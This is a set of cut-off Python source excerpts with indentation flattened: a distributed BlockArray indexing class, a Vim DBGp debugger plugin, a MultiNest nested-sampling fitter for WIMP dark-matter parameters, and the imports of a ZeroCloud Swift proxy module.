if isinstance(entry, BlockArray):
tmp.append(entry.get())
else:
tmp.append(entry)
ss = tuple(tmp)
is_handled_advanced = True
if len(ss) > 1:
# Check if all entries are full slices except the last entry.
for entry in ss[:-1]:
is_handled_advanced = is_handled_advanced and (isinstance(entry, slice)
and entry.start is None
and entry.stop is None)
if is_handled_advanced and array_utils.is_array_like(ss[-1]):
# Treat this as a shuffle.
return self._advanced_single_array_subscript(sel=(ss[-1],), axis=len(ss)-1)
av: ArrayView = ArrayView.from_block_array(self)
# TODO (hme): We don't have to create, but do so for now until we need to optimize.
return av[item].create(BlockArray)
def _advanced_single_array_subscript(self, sel: tuple, block_size=None, axis=0):
def group_by_block(dst_grid_entry,
dst_slice_tuples,
src_grid,
dst_index_list,
src_index_list,
axis=0):
# Block grid entries needed to write to given dst_slice_selection.
src_blocks = {}
dst_slice_np = np.array(dst_slice_tuples).T
dst_index_arr = np.array(dst_index_list)
src_index_arr = np.array(src_index_list)
# Pick the smallest type to represent indices.
# A set of these indices may be transmitted over the network,
# so we want to pick the smallest encoding possible.
index_types = [(2 ** 8, np.uint8), (2 ** 16, np.uint16),
(2 ** 32, np.uint32), (2 ** 64, np.uint64)]
index_type = None
for bound, curr_index_type in index_types:
if np.all(np.array(src_grid.block_shape[axis]) < bound) and np.all(
dst_slice_np[1][axis] < bound):
index_type = curr_index_type
break
if index_type is None:
raise Exception("Unable to encode block indices, blocks are too large.")
dst_entry_test = list(dst_grid_entry[:axis]) + list(dst_grid_entry[axis + 1:])
num_pairs_check = 0
for grid_entry in src_grid.get_entry_iterator():
# Must match on every entry except axis.
src_entry_test = list(grid_entry[:axis]) + list(grid_entry[axis+1:])
if dst_entry_test != src_entry_test:
# Skip this block.
continue
src_slice_np = np.array(src_grid.get_slice_tuples(grid_entry)).T
index_pairs = []
for i in range(src_index_arr.shape[0]):
src_index = src_index_arr[i]
dst_index = dst_index_arr[i]
if np.all((src_slice_np[0][axis] <= src_index)
& (src_index < src_slice_np[1][axis])):
index_pair = (np.array(dst_index - dst_slice_np[0][axis], dtype=index_type),
np.array(src_index - src_slice_np[0][axis], dtype=index_type))
index_pairs.append(index_pair)
num_pairs_check += 1
if len(index_pairs) > 0:
src_blocks[grid_entry] = index_pairs
assert num_pairs_check == len(dst_index_list)
return src_blocks
array = sel[0]
assert len(array.shape) == 1
assert np.all(0 <= array) and np.all(array < self.shape[axis])
if block_size is None:
block_size = self.block_shape[axis]
axis_dim = len(array)
shape = tuple(list(self.shape[:axis]) + [axis_dim] + list(self.shape[axis+1:]))
block_shape = tuple(list(self.block_shape[:axis])
+ [block_size]
+ list(self.block_shape[axis+1:]))
dst_arr = BlockArray.empty(shape=shape, block_shape=block_shape,
dtype=self.dtype, cm=self.cm)
for dst_grid_entry in dst_arr.grid.get_entry_iterator():
dst_block: Block = dst_arr.blocks[dst_grid_entry]
dst_slice_selection = dst_arr.grid.get_slice(dst_grid_entry)
dst_index_array = selection.slice_to_range(dst_slice_selection[axis], shape[axis])
src_index_array = array[dst_slice_selection[axis]]
assert len(dst_index_array) == len(src_index_array)
# Can this be sped up by grouping all src blocks outside of this loop?
src_blocks = group_by_block(
dst_grid_entry,
dst_arr.grid.get_slice_tuples(dst_grid_entry),
self.grid,
dst_index_array,
src_index_array,
axis
)
for src_grid_entry in src_blocks:
src_block: Block = self.blocks[src_grid_entry]
index_pairs = src_blocks[src_grid_entry]
syskwargs = {"grid_entry": dst_grid_entry, "grid_shape": dst_arr.grid.grid_shape}
dst_block.oid = self.cm.update_block_along_axis(dst_block.oid,
src_block.oid,
index_pairs,
axis,
syskwargs=syskwargs)
return dst_arr
def __setitem__(self, key, value):
av: ArrayView = ArrayView.from_block_array(self)
av[key] = value
def check_or_convert_other(self, other):
if isinstance(other, BlockArray):
return other
if isinstance(other, np.ndarray):
# TODO (MWE): for self.shape (4,) self.block_shape: (1,),
# other.shape: (1, 4) this fails due to a failure to broadcast block shape
return self.from_np(other, self.block_shape, False, self.cm)
if isinstance(other, list):
other = np.array(other)
return self.from_np(other, self.block_shape, False, self.cm)
if isinstance(other, (np.int32, np.int64, np.float32, np.float64, int, float)):
return self.from_scalar(other, self.cm)
if isinstance(other, (np.bool, np.bool_, bool)):
other = np.array(other)
return self.from_np(other, self.block_shape, False, self.cm)
raise Exception("Unsupported type %s" % type(other))
def ufunc(self, op_name):
result = self.copy()
for grid_entry in self.grid.get_entry_iterator():
result.blocks[grid_entry] = self.blocks[grid_entry].ufunc(op_name)
return result
def _tree_reduce(self, op_name, blocks_or_oids, result_grid_entry, result_grid_shape):
"""
Basic tree reduce imp.
Schedules op on same node as left operand.
:param op_name: The reduction op.
:param blocks_or_oids: A list of type Block or a list of tuples.
Tuples must be of the form
| |
# -*- c--oding: ko_KR.UTF-8 -*-
import os
import sys
import vim
import socket
import base64
import traceback
import xml.dom.minidom
import re
import unicodedata
#######################################################################################################################
# #
# this diagram is little outdated. #
# #
# #
# +---[ class Debugger ]-----------+ #
# | [m] run() | #
# | [m] mark() | #
# | [m] command() | #
# | [m] stop() | #
# +--------- [m] handle_msg() ------------------+ #
# | | | | handle all other tags #
# if error +--------> [m] handle_error() | | comming from server #
# | | [m] handle_*() <-----------------+ #
# | | | #
# if <response > +--------> [m] handle_response() -------------+ #
# | | | if <response command='*'> #
# | [m] handle_response_*() <----------+ #
# | | #
# | +--[ class DbgProtocol ]--+ | #
# +-------+ 1. connect | | | | #
# |debug | ---------------------> [m] accept() | | #
# | | <-- 2. send ---------- [m] send_msg() | | #
# | server| --- 3. recv ---------> [m] recv_msg() | | #
# +-------+ | | | | #
# | +-------------------------+ | #
# | | #
# | +--[ class BreakPoint ]---+ | #
# | | manage breakpoints | | #
# | | [m] add() | | #
# | | [m] remove() | | #
# | | [m] list() | | #
# | +-------------------------+ | VIM #
# | | +--------------+-----+ #
# [m] method | +--[ class DebugUI ]------+ | | | | <----+ #
# [f] class | | [m] debug_mode() | ------------------ | +-----+ | #
# | | [m] normal_mode() | | controls | srv | | <----+ #
# | | [m] goto() | | all vim | view +-----+ | #
# | | [m] stackwrite() | | windows | | | <----+ #
# | | [m] stackwrite() | | | +-----+ | #
# | +-------------------------+ | | | | <----+ #
# | | | +-----+ | #
# | +--[ class VimWindow ]----+ | | | | <----+ #
# | | [m] create() | | +--------------+-----+ | #
# | | [m] write() | | | #
# | | [m] create() | ------------------------------------------------+ #
# | | [m] create() | | controls each debug window #
# | +-------------------------+ | (except src view) #
# | | #
# +--------------------------------+ #
# #
# global debugger <----+ #
# | creates #
# [f] debugger_init() --+ #
# [f] debugger_run() <-+ #
# [f] debugger_context() | #
# [f] debugger_command() +------ map <F5> :python debugger_run() #
# [f] debugger_stop() | ... etc ... #
# [f] debugger_mark() <-+ #
# #
# #
#######################################################################################################################
#class XMLPrintFold(XMLPrint):
# def fixup_childs(self, line, node, level):
# line = ('{{{' + str(level+1)).ljust(level*4+6) + line + '\n'
# line += self.xml_stringfy_childs(node, level+1)
# line += '}}}' + str(level+1) + '\n'
# return line
# def fixup_single(self, line, node, level):
# return ''.ljust(level*4+6) + line + '\n'
#
class VimWindow:
""" wrapper class of window of vim """
def __init__(self, name = 'DEBUG_WINDOW'):
""" initialize """
self.name = name
self.buffer = None
self.firstwrite = 1
def isprepared(self):
""" check window is OK """
if self.buffer == None or len(dir(self.buffer)) == 0 or self.getwinnr() == -1:
return 0
return 1
def prepare(self):
""" check window is OK, if not then create """
if not self.isprepared():
self.create()
def on_create(self):
pass
def getwinnr(self):
return int(vim.eval("bufwinnr('"+self.name+"')"))
def xml_on_element(self, node,insert):
line = str(node.nodeName)
if node.hasAttributes():
for (n,v) in node.attributes.items():
line += str(' %s=%s' % (n,v))
return line
def xml_on_attribute(self, node,insert):
return str(node.nodeName)
def xml_on_entity(self, node,insert):
return 'entity node'
def xml_on_comment(self, node,insert):
return 'comment node'
def xml_on_document(self, node,insert):
return '#document'
def xml_on_document_type(self, node,insert):
return 'document type node'
def xml_on_notation(self, node,insert):
return 'notation node'
def xml_on_text(self, node,insert):
return node.data
def xml_on_processing_instruction(self, node,insert):
return 'processing instruction'
def xml_on_cdata_section(self, node,insert):
return node.data
def write(self, msg):
""" append last """
if type(msg) is unicode:
msg = unicodedata.normalize('NFKD',msg).encode('ascii','ignore')
self.prepare()
if self.firstwrite == 1:
self.firstwrite = 0
self.buffer[:] = str(msg).split('\n')
else:
self.buffer.append(str(msg).split('\n'))
self.command('normal G')
#self.window.cursor = (len(self.buffer), 1)
def insert(self, msg, lineno = None, overwrite = False, allowEmpty = False):
""" insert into current position in buffer"""
if len(msg) == 0 and allowEmpty == False:
return
self.prepare()
if self.firstwrite == 1:
self.firstwrite = 0
self.buffer[:] = str(msg).split('\n')
else:
if lineno == None:
(lineno, rol) = vim.current.window.cursor
remaining_buffer = str(msg).split('\n')
if overwrite:
lfrom = lineno + 1
else:
lfrom = lineno
remaining_buffer.extend(self.buffer[lfrom:])
del self.buffer[lineno:]
for line in remaining_buffer:
self.buffer.append(line)
def create(self, method = 'new'):
""" create window """
vim.command('silent ' + method + ' ' + self.name)
#if self.name != 'LOG___WINDOW':
vim.command("setlocal buftype=nofile")
self.buffer = vim.current.buffer
self.width = int( vim.eval("winwidth(0)") )
self.height = int( vim.eval("winheight(0)") )
self.on_create()
def destroy(self):
""" destroy window """
if self.buffer == None or len(dir(self.buffer)) == 0:
return
#if self.name == 'LOG___WINDOW':
# self.command('hide')
#else:
self.command('bdelete ' + self.name)
self.firstwrite = 1
def clean(self):
""" clean all datas in buffer """
self.prepare()
self.buffer[:] = []
self.firstwrite = 1
def command(self, cmd):
""" go to my window & execute command """
self.prepare()
winnr = self.getwinnr()
if winnr != int(vim.eval("winnr()")):
vim.command(str(winnr) + 'wincmd w')
vim.command(cmd)
def _xml_stringfy(self, node, insert, level = 0, encoding = None):
if node.nodeType == node.ELEMENT_NODE:
line = self.xml_on_element(node,insert)
elif node.nodeType == node.ATTRIBUTE_NODE:
line = self.xml_on_attribute(node,insert)
elif node.nodeType == node.ENTITY_NODE:
line = self.xml_on_entity(node,insert)
elif node.nodeType == node.COMMENT_NODE:
line = self.xml_on_comment(node,insert)
elif node.nodeType == node.DOCUMENT_NODE:
line = self.xml_on_document(node,insert)
elif node.nodeType == node.DOCUMENT_TYPE_NODE:
line = self.xml_on_document_type(node,insert)
elif node.nodeType == node.NOTATION_NODE:
line = self.xml_on_notation(node,insert)
elif node.nodeType == node.PROCESSING_INSTRUCTION_NODE:
line = self.xml_on_processing_instruction(node,insert)
elif node.nodeType == node.CDATA_SECTION_NODE:
line = self.xml_on_cdata_section(node,insert)
elif node.nodeType == node.TEXT_NODE:
line = self.xml_on_text(node,insert)
else:
line = 'unknown node type'
if node.hasChildNodes():
return self.fixup_childs(line, node, insert, level)
elif len(line) > 0:
return self.fixup_single(line, node, insert, level)
return line
def fixup_childs(self, line, node, insert, level):
line = ''.ljust(level*4) + line + '\n'
line += self.xml_stringfy_childs(node, insert, level+1)
return line
def fixup_single(self, line, node, insert, level):
return ''.ljust(level*4) + line + '\n'
def xml_stringfy(self, xml, insert = False):
return self._xml_stringfy(xml,insert)
def xml_stringfy_childs(self, node, insert = False, level = 0):
line = ''
for cnode in node.childNodes:
line += self._xml_stringfy(cnode, insert, level)
return line
def write_xml(self, xml):
self.write(self.xml_stringfy(xml))
def write_xml_childs(self, xml):
self.write(self.xml_stringfy_childs(xml))
def insert_xml(self, xml,lineno):
level = self.determine_current_level(lineno)
string = self.xml_stringfy(xml,True,level-1)
self.insert(string.strip("\n"),lineno,True)
def insert_xml_childs(self, xml,lineno):
level = self.count_left_spaces(lineno)
string = self.xml_stringfy_childs(xml,True,level-1)
self.insert(string.strip("\n"),lineno,True)
def count_left_spaces(self,lineno):
line = self.buffer[lineno]
matches = re.match("^(\s*)",line)
if matches:
spaces = matches.group(1)
return len(spaces)
else:
return 0
class StackWindow(VimWindow):
def __init__(self, name = 'STACK_WINDOW'):
VimWindow.__init__(self, name)
def xml_on_element(self, node, insert):
if node.nodeName != 'stack':
return VimWindow.xml_on_element(self, node, insert)
else:
if node.getAttribute('where') != '{main}':
fmark = '()'
else:
fmark = ''
return str('%-2s %-15s %s:%s' % ( \
node.getAttribute('level'), \
node.getAttribute('where')+fmark, \
node.getAttribute('filename')[7:], \
node.getAttribute('lineno')))
def on_create(self):
self.command('highlight CurStack term=reverse ctermfg=White ctermbg=Red gui=reverse')
self.highlight_stack(0)
def highlight_stack(self, no):
self.command('syntax clear')
self.command('syntax region CurStack start="^' +str(no)+ ' " end="$"')
class LogWindow(VimWindow):
def __init__(self, name = 'LOG___WINDOW'):
VimWindow.__init__(self, name)
def on_create(self):
self.command('setlocal wrap fdm=marker fmr={{{,}}} fdl=0')
class TraceWindow(VimWindow):
def __init__(self, name = 'TRACE_WINDOW'):
VimWindow.__init__(self, name)
self.created = 0
def xml_on_element(self, node, insert):
if node.nodeName != 'error':
return VimWindow.xml_on_element(self, node, insert)
else:
desc = ''
if node.hasAttribute('code'):
desc = ' : '+error_msg[int(node.getAttribute('code'))]
return VimWindow.xml_on_element(self, node, insert) + desc
def create(self,method="new"):
self.created = 1
VimWindow.create(self,method)
def write(self,msg):
if self.created == 0:
self.create('rightbelow 1new')
VimWindow.write(self,msg)
def on_create(self):
self.command('set wrap fdm=marker fmr={{{,}}} fdl=0')
class CmdWindow(VimWindow):
def __init__(self, name = 'CMD_WINDOW'):
VimWindow.__init__(self, name)
def input(self, mode, arg = ''):
line = self.buffer[-1]
if line[:len(mode)+1] == '{'+mode+'}':
self.buffer[-1] = line + arg
else:
self.buffer.append('{'+mode+'} '+arg)
def get_command(self,latest = True):
if latest == True:
line = self.buffer[-1]
else:
(lnum, rol) = vim.current.window.cursor
line = self.buffer[lnum-1]
if line[0] == '#':
raise CmdInvalidError({"message":"Line is a comment, not a command"})
allowed_cmds = ["eval","property_get","property_insert","context_get","context_class","context_global","context_names"]
matches = re.match('^\{([^}]+)\}\s*(.*)$',line)
if matches:
if matches.group(1) in allowed_cmds:
return (matches.group(1),matches.group(2))
else:
raise CmdInvalidError({"message":"Not a command: "+matches.group(1)})
else:
raise CmdInvalidError({"message":"Unrecognised format for command line"})
def on_create(self):
self.command('set nowrap number fdm=marker fmr={{{,}}} fdl=0')
self.command('inoremap <buffer> <cr> <esc>:python debugger.watch_execute(False)<cr>')
self.command('nnoremap <buffer> <cr> <esc>:python debugger.watch_execute(False)<cr>')
self.write("# Choice of commands: \n\
# {context_get}, {property_get} <property>, {eval} <expr>, \
{context_global}, {context_class}\n#")
class WatchWindow(VimWindow):
def __init__(self, name = 'WATCH_WINDOW'):
VimWindow.__init__(self, name)
self.cline = None
def fixup_single(self, line, node, | |
"""
Do a likelihood fit. The class NestedSamplerStatModel is used for fitting
applying the bayesian algorithm nestle/multinest
"""
from __future__ import absolute_import, unicode_literals
import datetime
import json
import os
import shutil
import tempfile
from warnings import warn
import corner
import matplotlib.pyplot as plt
import numpy as np
from scipy import special as spsp
import dddm
import typing as ty
from immutabledict import immutabledict
export, __all__ = dddm.exporter()
@export
class MultiNestSampler(dddm.StatModel):
def __init__(self,
wimp_mass: ty.Union[float, int],
cross_section: ty.Union[float, int],
spectrum_class: ty.Union[dddm.DetectorSpectrum,
dddm.GenSpectrum],
prior: dict,
tmp_folder: str,
results_dir: str = None,
fit_parameters=('log_mass', 'log_cross_section', 'v_0', 'v_esc', 'density', 'k'),
detector_name=None,
verbose=False,
notes='default',
nlive=1024,
tol=0.1,
):
super().__init__(wimp_mass=wimp_mass,
cross_section=cross_section,
spectrum_class=spectrum_class,
prior=prior,
tmp_folder=tmp_folder,
fit_parameters=fit_parameters,
detector_name=detector_name,
verbose=verbose,
notes=notes,
)
self.results_dir = results_dir
self.config.update(
{'tol': tol, # Tolerance for sampling
'nlive': nlive, # number of live points
})
self.log_dict = {
'did_run': False,
'saved_in': None,
'tmp_dir': tmp_folder,
}
self.result = False
def check_did_run(self):
if not self.log_dict['did_run']:
self.log.info('did not run yet, lets fire it up!')
self.run()
else:
self.log.info('did run')
def check_did_save(self):
self.log.info(
"did not save yet, we don't want to lose our results so better do it now"
)
if self.log_dict['saved_in'] is None:
self.save_results()
def log_probability_nested(self, parameter_vals, parameter_names):
"""
:param parameter_vals: the values of the model/benchmark considered as the truth
# :param parameter_values: the values of the parameters that are being varied
:param parameter_names: the names of the parameter_values
:return:
"""
self.log.debug('there we go! Find that log probability')
evaluated_rate = self.eval_spectrum(parameter_vals, parameter_names)
ll = dddm.statistics.log_likelihood(self.benchmark_values, evaluated_rate)
if np.isnan(ll):
raise ValueError(f"Returned NaN from likelihood. ll = {ll}")
self.log.debug('found it! returning the log likelihood')
return ll
def log_prior_transform_nested(self, x, x_name):
self.log.debug(
'doing some transformations for nestle/multinest to read the priors'
)
this_prior = self.config['prior'][x_name]
prior_type = this_prior['prior_type']
if prior_type == 'flat':
a, b = this_prior['param']
# Prior transform of a flat prior is a simple line.
return x * (b - a) + a
if prior_type == 'gauss':
# Get the range from the config file
a, b = this_prior['range']
m, s = this_prior['param']
# Here the prior transform is being constructed and shifted. This may not seem trivial
# and one is advised to request a notebook where this is explained
# from the developer(s).
aprime = spsp.ndtr((a - m) / s)
bprime = spsp.ndtr((b - m) / s)
xprime = x * (bprime - aprime) + aprime
return m + s * spsp.ndtri(xprime)
raise ValueError(f"unknown prior type '{prior_type}'")
def _log_probability_nested(self, theta):
"""warp log_prior_transform_nested"""
ndim = len(theta)
return self.log_probability_nested(
theta, self.known_parameters[:ndim])
def _log_prior_transform_nested(self, theta):
result = [
self.log_prior_transform_nested(val, self.known_parameters[i])
for i, val in enumerate(theta)]
return np.array(result)
def _print_before_run(self):
self.log.warning(
f"""
--------------------------------------------------
{dddm.utils.now()}\n\tFinal print of all of the set options:
self.log = {self.log}
self.result = {self.result}
self.benchmark_values = {np.array(self.benchmark_values)}
self.config = {self.config}
--------------------------------------------------
"""
)
def run(self):
self._fix_parameters()
self._print_before_run()
try:
from pymultinest.solve import run, Analyzer, solve
except ModuleNotFoundError as e:
raise ModuleNotFoundError(
'package pymultinest not found. See README') from e
n_dims = len(self.config["fit_parameters"])
tol = self.config['tol'] # the stopping criterion
save_at = self.get_save_dir()
self.log.warning(f'start_fit for {n_dims} parameters')
start = datetime.datetime.now()
# Multinest saves output to a folder. First write to the tmp folder,
# move it to the results folder later
_tmp_folder = self.get_save_dir()
save_at_temp = os.path.join(_tmp_folder, 'multinest')
solve_multinest(
LogLikelihood=self._log_probability_nested, # SafeLoglikelihood,
Prior=self._log_prior_transform_nested, # SafePrior,
n_live_points=self.config['nlive'],
n_dims=n_dims,
outputfiles_basename=save_at_temp,
verbose=True,
evidence_tolerance=tol,
# null_log_evidence=dddm.statistics.LL_LOW_BOUND,
max_iter=self.config.get('max_iter', 0),
)
self.result_file = save_at_temp
# Open a save-folder after successful running multinest. Move the
# multinest results there.
dddm.utils.check_folder_for_file(save_at)
end = datetime.datetime.now()
dt = (end - start).total_seconds()
self.log.info(f'fit_done in {dt} s ({dt / 3600} h)')
self.log_dict['did_run'] = True
# release the config
self.config = dddm.utils._immutable_to_dict(self.config)
self.config['fit_time'] = dt
self.log.info('Finished with running Multinest!')
def get_summary(self):
self.log.info(
"getting the summary (or at least trying) let's first see if I did run"
)
self.check_did_run()
# keep a dictionary of all the results
resdict = {}
# Do the import of multinest inside the class such that the package can be
# loaded without multinest
try:
from pymultinest.solve import run, Analyzer, solve
except ModuleNotFoundError:
raise ModuleNotFoundError(
'package pymultinest not found. See README for installation')
self.log.info('start analyzer of results')
analyzer = Analyzer(len(self.config['fit_parameters']),
outputfiles_basename=self.result_file)
# Taken from multinest.solve
self.result = analyzer.get_stats()
samples = analyzer.get_equal_weighted_posterior()[:, :-1]
self.log.info('parameter values:')
for name, col in zip(self.config['fit_parameters'],
samples.transpose()):
self.log.info(
'%15s : %.3f +- %.3f' %
(name, col.mean(), col.std()))
resdict[name + '_fit_res'] = (
'{0:5.2f} +/- {1:5.2f}'.format(col.mean(), col.std()))
if 'log_' in name:
resdict[name[4:] + '_fit_res'] = '%.3g +/- %.2g' % (
10. ** col.mean(), 10. ** (col.mean()) * np.log(10.) * col.std())
self.log.info(f'\t {name[4:]},'
f' {resdict[name[4:] + "_fit_res"]}')
resdict['best_fit'] = np.mean(samples.transpose(), axis=1)
print(resdict['best_fit'])
resdict['cov_matrix'] = np.cov(samples.transpose())
print(resdict['cov_matrix'])
resdict['n_samples'] = len(samples.transpose()[0])
# Pass the samples to the self.result to be saved.
self.result['samples'] = samples
self.log.info('Alright we got all the info we need')
return resdict
def get_save_dir(self, force_index=False, _hash=None) -> str:
saved_in = self.log_dict['saved_in']
saved_ok = isinstance(saved_in, str) and os.path.exists(saved_in)
if saved_ok and not force_index:
return saved_in
target_save = dddm.context.open_save_dir(
f'nes_{self.__class__.__name__[:3]}',
base_dir=self.results_dir,
force_index=force_index,
_hash=_hash)
self.log_dict['saved_in'] = target_save
self.log.info(f'get_save_dir\tsave_dir = {target_save}')
return target_save
def save_results(self, force_index=False):
self.log.info('Saving results after checking we did run')
# save fit parameters to config
self.check_did_run()
save_dir = self.get_save_dir(force_index=force_index)
fit_summary = self.get_summary()
self.log.info(f'storing in {save_dir}')
# save the config, chain and flattened chain
pid_id = 'pid' + str(os.getpid()) + '_'
with open(os.path.join(save_dir, f'{pid_id}config.json'), 'w') as file:
json.dump(convert_dic_to_savable(self.config), file, indent=4)
with open(os.path.join(save_dir, f'{pid_id}res_dict.json'), 'w') as file:
json.dump(convert_dic_to_savable(fit_summary), file, indent=4)
np.save(
os.path.join(save_dir, f'{pid_id}config.npy'),
convert_dic_to_savable(self.config))
np.save(os.path.join(save_dir, f'{pid_id}res_dict.npy'),
convert_dic_to_savable(fit_summary))
for col in self.result.keys():
if col == 'samples' or not isinstance(col, dict):
if col == 'samples':
# in contrast to nestle, multinest returns the weighted
# samples.
store_at = os.path.join(save_dir,
f'{pid_id}weighted_samples.npy')
else:
store_at = os.path.join(
save_dir,
pid_id + col + '.npy')
np.save(store_at, self.result[col])
else:
np.save(os.path.join(save_dir, pid_id + col + '.npy'),
convert_dic_to_savable(self.result[col]))
if 'logging' in self.config:
store_at = os.path.join(save_dir,
self.config['logging'].split('/')[-1])
shutil.copy(self.config['logging'], store_at)
self.log.info('save_results::\tdone_saving')
def show_corner(self):
self.check_did_save()
save_dir = self.log_dict['saved_in']
combined_results = load_multinest_samples_from_file(save_dir)
multinest_corner(combined_results, save_dir)
self.log.info('Enjoy the plot. Maybe you do want to save it too?')
def convert_dic_to_savable(config):
result = config.copy()
if isinstance(config, immutabledict):
result = dict(config.items())
for key, value in result.items():
if dddm.utils.is_savable_type(value):
continue
if isinstance(value, (dict, immutabledict)):
result[key] = convert_dic_to_savable(result[key])
elif isinstance(value, np.ndarray):
result[key] = value.tolist()
elif isinstance(value, np.integer):
result[key] = int(value)
elif isinstance(value, np.floating):
result[key] = float(value)
else:
result[key] = str(result[key])
return result
def load_multinest_samples_from_file(load_dir):
keys = os.listdir(load_dir)
keys = [key for key in keys if os.path.isfile(os.path.join(load_dir, key))]
result = {}
for key in keys:
if '.npy' in key:
naked_key = key.split('.npy')[0]
naked_key = do_strip_from_pid(naked_key)
tmp_res = np.load(os.path.join(load_dir, key), allow_pickle=True)
if naked_key in ['config', 'res_dict']:
result[naked_key] = tmp_res.item()
else:
result[naked_key] = tmp_res
return result
def do_strip_from_pid(string):
"""
remove PID identifier from a string
"""
if 'pid' not in string:
return string
new_key = string.split("_")
new_key = "_".join(new_key[1:])
return new_key
def _get_info(result, _result_key):
info = r"$M_\chi}$=%.2f" % 10. ** np.float64(result['config']['log_mass'])
for prior_key in result['config']['prior'].keys():
if (prior_key in result['config']['prior'] and
'mean' in result['config']['prior'][prior_key]):
mean = result['config']['prior'][prior_key]['mean']
info += f"\n{prior_key} = {mean}"
nposterior, ndim = np.shape(result[_result_key])
info += "\nnposterior = %s" % nposterior
for str_inf in ['detector', 'notes', 'start', 'fit_time', 'poisson',
'n_energy_bins']:
if str_inf in result['config']:
info += f"\n{str_inf} = %s" % result['config'][str_inf]
if str_inf == 'start':
info = info[:-7]
if str_inf == 'fit_time':
info += 's (%.1f h)' % (float(result['config'][str_inf]) / 3600.)
return info, ndim
def multinest_corner(
result,
save=False,
_result_key='weighted_samples',
_weights=False):
info, ndim = _get_info(result, _result_key)
labels = dddm.statistics.get_param_list()[:ndim]
truths = []
for prior_name in dddm.statistics.get_prior_list()[:ndim]:
if prior_name == "rho_0":
prior_name = 'density'
if prior_name in result['config']:
truths.append(result['config'][prior_name])
else:
truths.append(result['config']['prior'][prior_name]['mean'])
weight_kwargs = dict(weights=result['weights']) if _weights else {}
fig = corner.corner(
result[_result_key],
**weight_kwargs,
labels=labels,
range=[0.99999, 0.99999, 0.99999, 0.99999, 0.99999][:ndim],
truths=truths,
show_titles=True)
fig.axes[1].set_title('Fit title', loc='left')
fig.axes[1].text(0, 1, info, verticalalignment='top')
if save:
plt.savefig(f"{save}corner.png", dpi=200)
def solve_multinest(LogLikelihood, Prior, n_dims, **kwargs):
"""
See PyMultinest Solve() for documentation
"""
from pymultinest.solve import run, Analyzer
kwargs['n_dims'] = n_dims
files_temporary = False
if 'outputfiles_basename' not in kwargs:
files_temporary = True
tempdir = tempfile.mkdtemp('pymultinest')
kwargs['outputfiles_basename'] = tempdir + '/'
outputfiles_basename = kwargs['outputfiles_basename']
def SafePrior(cube, ndim, nparams):
a = np.array([cube[i] for i in range(n_dims)])
b = Prior(a)
for i in range(n_dims):
cube[i] = b[i]
def SafeLoglikelihood(cube, ndim, nparams, lnew):
a = np.array([cube[i] for i in range(n_dims)])
likelihood = float(LogLikelihood(a))
if not np.isfinite(likelihood):
| |
<filename>zerocloud/proxyquery.py
from copy import deepcopy
import ctypes
from itertools import chain
import re
import struct
import traceback
import time
import datetime
from urllib import unquote
import uuid
from hashlib import md5
from random import randrange, choice
import greenlet
from eventlet import GreenPile
from eventlet import GreenPool
from eventlet import Queue
from eventlet import spawn_n
from eventlet.green import socket
from eventlet.timeout import Timeout
import zlib
from swift.common.storage_policy import POLICIES
from swift.common.request_helpers import get_sys_meta_prefix
from swift.common.wsgi import make_subrequest
from swiftclient.client import quote
from swift.common.http import HTTP_CONTINUE
from swift.common.http import is_success
from swift.common.http import HTTP_INSUFFICIENT_STORAGE
from swift.common.http import is_client_error
from swift.common.http import HTTP_NOT_FOUND
from swift.common.http import HTTP_REQUESTED_RANGE_NOT_SATISFIABLE
from swift.proxy.controllers.base import update_headers
from swift.proxy.controllers.base import delay_denial
from swift.proxy.controllers.base import cors_validation
from swift.proxy.controllers.base import get_info
from swift.proxy.controllers.base import close_swift_conn
from swift.common.utils import split_path
from swift.common.utils import get_logger
from swift.common.utils import TRUE_VALUES
from swift.common.utils import get_remote_client
from swift.common.utils import ContextPool
from swift.common.utils import cache_from_env
from swift.common.utils import normalize_timestamp
from swift.common.utils import GreenthreadSafeIterator
from swift.proxy.server import ObjectController
from swift.proxy.server import ContainerController
from swift.proxy.server import AccountController
from swift.common.bufferedhttp import http_connect
from swift.common.exceptions import ConnectionTimeout
from swift.common.exceptions import ChunkReadTimeout
from swift.common.constraints import check_utf8
from swift.common.constraints import MAX_FILE_SIZE
from swift.common.constraints import MAX_HEADER_SIZE
from swift.common.constraints import MAX_META_NAME_LENGTH
from swift.common.constraints import MAX_META_VALUE_LENGTH
from swift.common.constraints import MAX_META_COUNT
from swift.common.constraints import MAX_META_OVERALL_SIZE
from swift.common.swob import Request
from swift.common.swob import Response
from swift.common.swob import HTTPNotFound
from swift.common.swob import HTTPPreconditionFailed
from swift.common.swob import HTTPRequestTimeout
from swift.common.swob import HTTPRequestEntityTooLarge
from swift.common.swob import HTTPBadRequest
from swift.common.swob import HTTPUnprocessableEntity
from swift.common.swob import HTTPServiceUnavailable
from swift.common.swob import HTTPClientDisconnect
from swift.common.swob import wsgify
from swift.common.swob import HTTPNotImplemented
from swift.common.swob import HeaderKeyDict
from swift.common.swob import HTTPException
from zerocloud import load_server_conf
from zerocloud.common import CLUSTER_CONFIG_FILENAME
from zerocloud.common import NODE_CONFIG_FILENAME
from zerocloud import TAR_MIMES
from zerocloud import POST_TEXT_OBJECT_SYSTEM_MAP
from zerocloud import POST_TEXT_ACCOUNT_SYSTEM_MAP
from zerocloud import merge_headers
from zerocloud import DEFAULT_EXE_SYSTEM_MAP
from zerocloud import STREAM_CACHE_SIZE
from zerocloud.common import parse_location
from zerocloud import can_run_as_daemon
from zerocloud.common import SwiftPath
from zerocloud.common import ImagePath
from zerocloud import TIMEOUT_GRACE
from zerocloud.configparser import ClusterConfigParser
from zerocloud.configparser import ClusterConfigParsingError
from zerocloud.tarstream import StringBuffer
from zerocloud.tarstream import UntarStream
from zerocloud.tarstream import TarStream
from zerocloud.tarstream import REGTYPE
from zerocloud.tarstream import BLOCKSIZE
from zerocloud.tarstream import NUL
from zerocloud.tarstream import ExtractedFile
from zerocloud.tarstream import Path
from zerocloud.tarstream import ReadError
from zerocloud.thread_pool import Zuid
ZEROVM_COMMANDS = ['open', 'api']
ZEROVM_EXECUTE = 'x-zerovm-execute'
try:
import simplejson as json
except ImportError:
import json
STRIP_PAX_HEADERS = ['mtime']
# Monkey patching Request to support content_type property properly
def _req_content_type_property():
"""
Set and retrieve Request.content_type
Strips off any charset when retrieved
"""
def getter(self):
if 'content-type' in self.headers:
return self.headers.get('content-type').split(';')[0]
def setter(self, value):
self.headers['content-type'] = value
return property(getter, setter,
doc="Retrieve and set the request Content-Type header")
Request.content_type = _req_content_type_property()
def check_headers_metadata(new_req, headers, target_type, req, add_all=False):
prefix = 'x-%s-meta-' % target_type.lower()
meta_count = 0
meta_size = 0
for key, value in headers.iteritems():
